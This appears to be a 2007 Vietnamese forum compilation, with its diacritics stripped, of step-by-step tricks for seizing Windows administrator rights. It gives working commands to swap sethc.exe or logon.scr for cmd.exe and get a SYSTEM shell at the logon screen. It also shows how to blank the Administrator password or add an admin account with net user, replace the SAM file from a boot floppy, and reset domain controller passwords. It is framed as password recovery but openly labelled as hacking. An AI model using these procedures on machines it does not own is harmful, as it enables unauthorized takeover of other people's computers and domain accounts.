Tổng hợp các thủ thuật đoạt quyền admin windows

Tng hp cc th thut ot quyn admin windows xp3 Comments Posted by vuau on 30/12/2007 Hin nay c nhiu cch phc hi mt khu ca ti khon Administrator trong Windows b qun mt. C th k n l dng cng c h tr ca a Hiren Boot xa trng mt khu ca ti khon Administrator hay dng cc cng c d tm mt khu trn Net. Tuy vy, khng phi lc no chng ta cng c cng c dng. Nu gp nhng lc nh th. hy li dng l hng ca file sethc.exe trn Windows. Gii thch th thut ny (cho cc chuyn gia thch suy ngh) Trn Windows XP, nu bn nhp phm Shift 5 ln, Windows s gi mt chng trnh nh c tn l StickyKey. y l chng trnh h tr ngi khuyt tt khi s dng Windows XP c nh km mc inh trong b tin ch ca Windows. iu ny c ngha l bn c th gi chng trnh ny bng phm tt m khng cn n giao din thn thin (1). Nu bn ng nhp bng ti khon c tn User1 v nhp phm Shift 5 ln gi chng trnh ny, Windows s ly quyn ca User1 gi chng trnh StickyKey. Nu bn khng ng nhp vo bt k mt ti khon no m gi c StickyKey th Widnows s ly quyn ca h thng (System) chy StickyKey (2). T gi nh (1) v (2) trn, nu bn thay th file thc thi ca chng trnh StickyKey (sethc.exe) bng chng trnh Command Run (cmd.exe) v gi n bng 5 ln phm Shift m khng ng nhp bng ti khon no c th windows s dng quyn ca H thng (system) gi file cmd.exe thay v file sethc.exe. Th l c th lm bt c chuyn g bng ti khon ca cao nht (quyn ca H thng) trn chng trnh Command Run. Bc 1: Vo windows vi ti khon User bnh thng v nhn 5 ln phm Shift gi th chng trnh StickyKey trn Windows v ng n li (ch nhm xem th). Bc 2: Vo Start >> Run >> nhp vo Notepad v Enter gi chng trnh Notepad.exe. Copy on m ca mnh vit, past vo notepad, Save li vi tn l Hackpass.bat Code: cd %systemroot%/system32 rename sethc.exe sethc.exe.bk copy cmd.exe sethc.exe /y Sau nhp kp chut ln file Hackpass.bat thc thi! on m ny lm cc nhim v sau: 1. Sao lu li file sethc.exe bng cch t li tn l sethc.exe.bk

2. Thay th file sethc.exe bng file cmd.exe n y, bn nhp phm Shift 5 ln, nu chng trnh Command Run c gi thay v chng trnh StickyKey th bn thnh cng! Bc 3: Khi ng li my. Khi n mn hnh ng nhp, bn khoan hy ng nhp m nhn phm Shift 5 ln Lc ny chng trnh Command Run xut hin, bn nhp mt trong nhng vo on lnh di y Xa trng password ca Administrator: Code: net user Administrator - > nhn phm Enter khi hon thnh! Thm mt ti khon Admin vi mt khu l 123 Code: net user Admin 123 /add - > nhn phm Enter khi hon thnh! Gn ti khon Admin vo nhm qun tr: Code: net localgroup Administrators Admin /add - > nhn phm Enter khi hon thnh! Nu bn s dng ng cu trc lnh pha trn, bn s to c cc ti khon mi. Ti y, bn c th ng nhp vo cc ti khon mi m khng cn khi ng li my! Cch ot quyn Admin trong Win 2000, 2003, XP 1. Cch ot quyn Admin trong Win2K : - Trc ht bn phi Download phn mm NTFS4DOS v to a khi ng c th nhn c a c phn vng NTFS . - Sau khi Download v bn tin hnh ci t v to a mm khi ng ( Ch : Trc khi to a mm khi ng c th nhn thy phn vng NTFS th a mm ca bn phi c Format v l a Boot c th boot c t DOS t trc th mi c th dng phn mm NTFS4DOS to a mm c th nhn c phn vng NTFS t DOS ) . Th l xong bc to a mm boot . - Tip theo bn n ci my m bn mun ot quyn Admin v vo CMOS ca n t First Boot l : Floppy Driver ( Nu my t password CMOS th bn c th ph Pass CMOS bng cc phn mm khc , tui xin min hng dn phn ny ) . - Sau khi khi ng v Boot bng a mm s hin ra 3 phn cho bn chn , bn chn ci u tin l : NTFS4DOS . Sau bn c mc cho n chy tip. Tip sau n s hin

ra mt dng thng bo hi bn c mun s dng tin ch NTFS4DOS ko ? bn nh ch yes v n Enter . sau n s hin ra dng A:\> bn chuyn sang a cng l phn vng chnh ci Win ( y ti s ly v d l C A:\> C: C:\> cd WINNT\SYSTEM32\CONFIG ( dng lnh cd chuyn n th mc WINNT\SYSTEM32\CONFIG Tip tc : Ti C:\>WINNT\SYSTEM32\CONFIG bn nh lnh dir C:\>WINNT\SYSTEM32\CONFIG\dir Ta s nhn thy file c tn l : SAM Tip tc ti du nhc lnh : C:\>WINNT\SYSTEM32\CONFIG bn nh lnh C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG sau bn nh th li lnh Dir kim tra xem c file tn DUNG cha ? Nu c ri th thnh cng . Ch : Tt nht l trc khi nh lnh ren SAM DUNG i tn file SAM bn ln backup n trc : C:\>WINNT\SYSTEM32\CONFIG\md Backup ( to th mc backup) C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP ( lm nh vy cho chc n ) Sau bn restart li my th l OK , khi ng nhp vo my bn ch cn g User l : Administrator cn Password th khng cn nh ch vic g Enter . 2 . Cch ot quyn Admin trong WinXP : - Cch lm th tng t nh l trog Win2K , nhng nh cc bn bit nu nh chng ta cng i tn file SAM nh trong WIN2K th chc chn l WinXP s b li v khng th no vo c Win ( S b Restart li my ) - Vy th lm cch no c th ot c qun Administrator bi gi ? . C mt cch v tui th thnh cng , khng bit cc bn on ra cha nh , nu ai bit ri th thui nh , tui post cho nhng ngi cha bit . - u tin tui cng cha bit lm th no, nhng v sau tui nh liu v th mt cch nh sau : + Tui n mt my ci WinXP khc , tui to Pass ca user c tn l Administrator l trng (Ngha l khng t password , password b trng) , tui khi ng li my , sau

tui vo DOS v copy li ci file SAM ci my m tui va to vi pass ca User : Administrator (y l ngi c quyn qun tr cao nht) l trng vo th mc BACKUP trong a mm ca tui. + Sau tui sang ci my ci WinXP m tui mun cp quyn Admin ( Vi pass ca Administrator m tui khng bit ) + v tui lm y nh cc bc nh trn ( Ch : Trong WINXP th khng phi l th mc WINNT nh trong Win2K m n l th mc WINDOWS) : Sau khi khi ng v Boot bng a mm s hin ra 3 phn cho bn chn , bn chn ci u tin l : NTFS4DOS . Sau bn c mc cho n chy tip. Tip sau n s hin ra mt dng thng bo hi bn c mun s dng tin ch NTFS4DOS ko ? bn nh ch yes v n Enter . sau n s hin ra dng A:\> bn chuyn sang a cng l phn vng chnh ci Win ( y ti s ly v d l C A:\> C: C:\> cd WINDOWS\SYSTEM32\CONFIG ( dng lnh cd chuyn n th mc WINDOWS\SYSTEM32\CONFIG Tip tc : Ti C:\>WINDOWS\SYSTEM32\CONFIG bn nh lnh dir C:\>WINDOWS\SYSTEM32\CONFIG\dir Ta s nhn thy file c tn l : SAM Tip tc ti du nhc lnh : C:\>WINDOWS\SYSTEM32\CONFIG bn nh lnh C:\>WINDOWS\SYSTEM32\CONFIG\ren SAM DUNG sau bn nh th li lnh Dir kim tra xem c file tn DUNG cha ? Nu c ri th thnh cng . Ch : Tt nht l trc khi nh lnh ren SAM DUNG i tn file SAM bn ln backup n trc : C:\>WINDOWS\SYSTEM32\CONFIG\md Backup ( to th mc backup) C:\>WINDOWS\SYSTEM32\CONFIG\copy SAM C:\>WINDOWS\SYSTEM32\CONFIG\BACKUP ( lm nh vy cho chc n ) - Tip theo t C:\>WINDOWS\SYSTEM32\CONFIG tui nh lnh C:\>WINDOWS\SYSTEM32\CONFIG A: chuyn sang mm A - Ti A ta nh lnh A:\>cd Backup vo th mc BACKUP trong A . - Ti A:\>BACKUP> ta nh lnh dir kim tra xem thy file SAM trong cha A\BACKUP>dir - T A\BACKUP\ ta nh lnh : A\BACKUP\copy SAM C:\>WINDOWS\SYSTEM32\CONFIG (Ch : Trc khi nh lnh trn th bn phi chc chn l file SAM trong th mc C:\>WINDOWS\SYSTEM32\CONFIG c i tn thnh tn khc ) - Sau khi nh lnh trn xong nu copy thnh cng bn s nhn c 1 thng bo l : 1 file copy g g tui khng nh lm . Sau bn khi ng li my v b a mm ra . - Khi ng nhp vo my bn g user l Administrator v password l trng bn c vic g Enter th l Okie gi y bn l Ngi c quyn qun tr cao nht. 3. Cch ot quyn Admin trong Win 2000 Server s dng Domain Controller :

Vi thng Win2kSrv DC ny th hi rc ri hn mt cht , v my s dng Win2kSrv DC th pass Admin s khng lu trong file SAM na , v file SAM ch p dng cho Local m thui . Trong Win2kSrv DC th nu nh tui nh khng nhm th n nm file g c ui l .DIT th phi ( Nu tui nh khng nhm nha ) ) Trc ht cc bn cng lm cc bc nh trn : Sau khi khi ng v Boot bng a mm hoc l a CD s hin ra 3 phn cho bn chn , bn chn ci u tin l : NTFS4DOS . Sau bn c mc cho n chy tip. Tip sau n s hin ra mt dng thng bo hi bn c mun s dng tin ch NTFS4DOS ko ? bn nh ch yes v n Enter . sau n s hin ra dng A:\> bn chuyn sang a cng l phn vng chnh ci Win ( y ti s ly v d l C A:\> C: C:\> cd WINNT\SYSTEM32\CONFIG ( dng lnh cd chuyn n th mc WINNT\SYSTEM32\CONFIG Tip tc : Ti C:\>WINNT\SYSTEM32\CONFIG bn nh lnh dir C:\>WINNT\SYSTEM32\CONFIG\dir Ta s nhn thy file c tn l : SAM Tip tc ti du nhc lnh : C:\>WINNT\SYSTEM32\CONFIG bn nh lnh C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG sau bn nh th li lnh Dir kim tra xem c file tn DUNG cha ? Nu c ri th thnh cng . Ch : Tt nht l trc khi nh lnh ren SAM DUNG i tn file SAM bn ln backup n trc : C:\>WINNT\SYSTEM32\CONFIG\md Backup ( to th mc backup) C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP ( lm nh vy cho chc n ) Sau bn Restart li my , sau khi my khi ng li bn n phm F8 lin tc vo ch la chn , sau khi n F8 s c nhiu mc cho bn la chn , nhng hack c bn phi chn vo ch Directory Service Recovery Mode . . . Sau bn s vo c trong ch Safemode v my s yu cu bn n t hp phm CTRL-ALT-DEL v bn ng nhp vo my vi User l : Administrator v tt nhin l Password s khng c ri . Nhng bn ng tng vy l xong v bn c i Password kiu g i na bn cng khng ng nhp c vo my ch hot ng bnh thng u v ci m bn t ch l Local thui m my li s dung DC c . V vy ot c quyn Admin ca Win2kSrv DC tip bn lm nh sau : - Bn vo Start > Run > v g regedit . Bn s truy cp vo c Registry Editor ca Windows sau bn tm n kha sau : HKEY_USERS\.Default\Control Panel\Desktop v bn chnh cc thng s ti nh sau : + SCRNSAVE.EXE mc nh l logon.scr bn nhy kp chut vo n thay i gi tr logon.scr thnh cmd.exe

+ ScreenSaveTimeout mc nh l 900 bn nhy kp chut vo n thay i gi tr 900 thnh 10 + ScreenSaveActive bn thay i thnh l 1 ( Nu mc nh l 1 ri thi thi ko cn phi thay i g c ) Th l Okie ri v bn Restart li my . Bn cho my khi ng bnh thng , khi bn thy hp thoi yu cu n CTRL-ALT-DEL hin ra, bn ng ng g vo n c hay ch i 10 s > 25 s ( Tt nht l t u khi khi ng li bn ng ng g vo n ) - Sau khi ch 10 > 25 s bn s thy mn hnh command hin ra. Ti hp thoi command ny bn nh lnh : DSA.MSC v bng : Active Directory user and computer hin ra s s trc mt bn ka ) bn ch vic click vo folder user bn phi v bn tri hp thoi s hin ra tt c cc user trong Domain v cng vic by gi ca bn ch vic i Pass ca Administrator hoc bt c User no m bn mun bng cch chut phi vo user m bn mun i password. Bn chn set password v bn nhp mt khu mi m bn mun vo ( Gi s l Administrator chng hn v y l user c quyn ti cao nht trong Domain ). Sau bn tt ca s Command Prompt i n CTRL ALT DEL v gi s user l : Administrator vi password l : password mi m bn va to , v tt c l ca bn ht . Chc thnh cng cch 2: Cch ny ch yu da trn lnh net user, y l 1 lnh command prompt c tc dng to, xem, xa v i pass cho 1 account vi c php net user . Tuy nhin, theo ch phn quyn ca Windows th ch cp trn mi c quyn x l cp di nn cc account user s khng c thm quyn dng lnh ny trn account admin, cho nn vn ca chng ta y l lm sao c th thc hin lnh ny trong 1 mi trng trung lp chnh l logon screen. Cch lm nh sau: Vo Start > Run (hay g Windows + R) > g cmd khi ng command prompt. Tip theo chng ta s ln lt g cc lnh sau: cd \windows\system32 (chuyn vo system32) mkdir backup (to th mc backup) copy logon.scr backup\logon.scr (chp file logon.scr vo th mc backup) copy cmd.exe backup\cmd.exe (chp file cmd.exe vo th mc backup) del logon.scr (xa file logon.scr) rename cmd.exe logon.scr (i tn file cmd.exe thnh logon.scr) exit by h th mi vic xong, chng ta ch vic restart li Windows ti logon screen v ngi i vi pht ti khi screen saver hin ra, m lc ny bin thnh khung command prompt bn c th s dng cu lnh net user trn. /////////////////// theo mnh th bn chy win mini, v trong dos>system32> g lnh: Ren Sethc.exe_tnfile sethc.exe copy.cmd.exe_sethc.exe

///////////////////// Cho tt c mi ngi, nay mnh mi su tm c bi vit thy hay hay post ln cho anh em tham kho " hack password window". Nu cc bn c tham kho ti liu v window th chc c l cc bn s bit Microsoft vit ra h iu hnh khng ch cho nhng ngi lnh lng nh chng ta m cn dnh cho ngi khuyt tt na l tnh nng "Accessibility Option" trong control panel. Li dng tnh nng ny cc hacker xm nhp vo h thng mt cch d dng m khng cn password ngi s dng. Sau y ti xin hng dn cch lm: Mc nh khi vo mn hnh logon chng ta nhn SHIFT 5 ln th win s gi file sethc.exe chy chng trnh Stickykey. By gi chng ta s thay th file ny thnh cmd.exe chy chng trnh commander. Ta thc hin nh sau: u tin ta phi vo DOS trc (dng a boot ngoi dos thng s dng Hiren boot). Vo c dos ta g lnh cd C:\windows\system32 nhn Enter 'lnh ny chuyn n th mc cha file sethc.exe' tip tc g lnh rename sethc.exe sethc.bat nhn Enter ' lnh ny dng i tn file sethc.exe thnh sethc.bat ch : chng ta c th i file sethc.exe thnh file bt k min sao d nh sau ny khi phc li l c'. g tip lnh copy cmd.exe sethc.exe /y ' lnh ny thay th file sethc.exe bng cmd.exe' n y xem nh chng ta thnh cng 50% khi ng li my n mn hnh ng nhp ta nhn SHIFT 5 ln gi cmd By gi c cc lnh cho chng ta la chn nu mun xa pass Admin th ta g lnh net user administrator nhn Enter nu mun to user mi ta g lnh net user tenuser pass /add nhn Enter ( tenuser ty thch v d admin....,pass c th nhp hoc trng)nhng y ch l mt user bnh thng nu ta mun nm trn quyn trn my ny ta g lnh

net localgroup administrators tenuser /add nhn Enter. by gi chng ta c th s dng my tnh vi quyn qun tr cao nht. P/S: Thy hay th mnh post ln cho cc bn tham kho thui ch mnh cha vc ln no, knh mi cc vc s ti gia tr ti no, hehe Chc cc bn thnh cng v may mn trong cuc sng, v c nhng pht giy tuyt vi ti din n iSpace ca cng ta!! Thn.

Documents

Tổng hợp các thủ thuật đoạt quyền admin windows